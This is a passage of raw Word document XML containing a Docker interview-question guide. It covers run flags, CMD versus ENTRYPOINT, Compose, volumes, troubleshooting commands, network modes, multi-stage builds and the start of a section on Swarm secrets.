    <w:p w14:paraId="077DC9C2"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To run a Docker container from the image, use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB1D118"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bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AF79B5"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Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDCF57C"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docker run -d -p 80:80 my-image-name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C282FF" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="591"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-d: Runs the container in detached mode (in the background).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41282829" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="591"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-p 80:80: Maps port 80 of the host to port 80 of the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C99773A"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88" w:name="_Toc178383370"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Explain the difference between CMD and ENTRYPOINT in a Dockerfile.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="188"/>
    </w:p>
    <w:p w14:paraId="667FB234"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p>
    <w:p w14:paraId="4BE44F54" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="592"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CMD</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Provides default arguments for an ENTRYPOINT. It can be overridden by passing arguments to docker run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C42C93" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="592"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ENTRYPOINT</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Defines the command that will always run within the container. It’s not easily overridden, making it useful for setting up the main process to run in a container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EEBBD3"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0AD64375"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Dockerfile with CMD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E6899D"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FROM node:14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3A2906"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WORKDIR /app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15448E9E"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COPY . .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02200929"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CMD ["node", "app.js"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220C217E"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466DB013"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Dockerfile with ENTRYPOINT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79089673"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FROM ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5980B9E7"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ENTRYPOINT ["echo"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A68C423"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CMD ["Hello, World!"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603937CC"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Running the container built from the ENTRYPOINT example with docker run &lt;image&gt; will execute echo "Hello, World!". Overriding CMD with docker run &lt;image&gt; Goodbye will result in echo "Goodbye".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1E7916"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89" w:name="_Toc178383371"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6. What is Docker Compose, and how does it work?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="189"/>
    </w:p>
    <w:p w14:paraId="4217EAA7"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Docker Compose is a tool used to define and manage multi-container Docker applications. Using a YAML file (docker-compose.yml), you can configure your application’s services, networks, and volumes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A91E235"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Example docker-compose.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF0F754"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version: '3'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4D2B5B"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services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8513BB"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web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3552C653"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image: nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438F2C61"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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A650FD"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"8080:80"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157DEC41"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db:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADD3423"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image: mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3325D0DF"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environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCAD0A8"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      MYSQL_ROOT_PASSWORD: example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB3881D"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To start the defined services, run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A0AE02" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>docker-compose up -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19407811"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This command builds, (re)creates, starts, and attaches containers for a service in detached mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594AE909"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0" w:name="_Toc178383372"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7. What is a Docker Volume, and how do you use it?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="190"/>
    </w:p>
    <w:p w14:paraId="29DAD556"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Docker Volume is a persistent data storage mechanism that allows data to be shared between containers or preserved even after a container is deleted. Volumes are managed by Docker and can be stored outside the container’s Union File System.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3720A1"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Creating and using a volume:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1532E0E8"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volume create my-volume</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEAEB63"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run -d -v my-volume:/data my-image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E551D43"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In this example, /data inside the container is mapped to my-volume on the host, making data persistent across container restarts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02508D8D"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1" w:name="_Toc178383373"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8. How do you monitor and troubleshoot Docker containers?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="191"/>
    </w:p>
    <w:p w14:paraId="67531783"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p>
    <w:p w14:paraId="79B9ECC2" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="593"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitoring Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBCBC18" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="593"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Docker’s built-in commands: docker stats, docker inspect, docker logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F88DB08" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="593"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>External tools: Prometheus, Grafana, cAdvisor, and ELK Stack (Elasticsearch, Logstash, Kibana).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6047948D" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="593"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Troubleshooting Techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351ACC7A" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="593"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: docker logs &lt;container_id&gt; retrieves the logs from a container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60232355" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="593"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Inspect</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: docker inspect &lt;container_id&gt; provides detailed information about a container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0F6ADE" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="593"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Exec</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: docker exec -it &lt;container_id&gt; /bin/bash allows you to run commands inside a running container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D838B35" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="593"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Events</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: docker events tracks real-time events on the Docker daemon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8051CF"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2" w:name="_Toc178383374"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9. What is the difference between docker network bridge, host, and none?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="192"/>
    </w:p>
    <w:p w14:paraId="37CF5F12"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p>
    <w:p w14:paraId="297F0C75" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="594"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Bridge Network (default):</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Containers connected to a bridge network can communicate with each other, and they have a private IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0DB2F5" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="594"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Host Network:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The container shares the host's network stack and has direct access to the host’s network interfaces. No network isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A971B4C" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="594"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>None Network:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Disables all networking for the container, which is useful for security or isolated tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FF1897"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Example of creating a bridge network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF612B1" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pP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network create my-bridge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4138075D" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pP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run -d --network=my-bridge my-container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7F4664"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3" w:name="_Toc178383375"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10. What is a multi-stage build in Docker, and why is it useful?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="193"/>
    </w:p>
    <w:p w14:paraId="36BC285F"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multi-stage build is a feature in Docker that allows you to use multiple FROM statements in a single Dockerfile, each with a different base image. It is primarily used to reduce the final image size by copying only the necessary artifacts from one stage to another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B658745"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Example of a Multi-Stage Build:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1742E4A6"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Stage 1: Build stage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4A824D"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FROM node:14 AS build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5175C78C"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WORKDIR /app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E751E34"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COPY . .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E146A49"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RUN npm install &amp;&amp; npm run build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503E519A"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p>
    <w:p w14:paraId="01CD6E0C"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Stage 2: Production stage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41036174"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FROM nginx:alpine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BE8798"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COPY --from=build /app/build /usr/share/nginx/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D64A4A3"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This Dockerfile builds the application in the first stage and only copies the final build output to the NGINX server in the second stage, resulting in a smaller final image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790CF9EC"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4" w:name="_Toc178383376"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>11. How do you manage secrets in Docker?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="194"/>
    </w:p>
    <w:p w14:paraId="01DCC47B"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Secrets management in Docker is crucial for keeping sensitive information (e.g., passwords, API keys) secure. Docker Swarm provides built-in support for secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6A4BF9"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Steps to use Docker Secrets in Swarm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F14628" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Create a secret:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476DB76C"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echo "my_secret" | docker secret create my_secret -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572277EF" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use the secret in a service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A66E720"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version: '3.7'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BD7D6F"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services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2881D7C1"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web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183EC515"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image: nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1B726C"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secrets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27017121"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my_secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5DB4EF"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secrets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF32CA3"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my_secret:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22042DC7"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external: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155CE67D" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
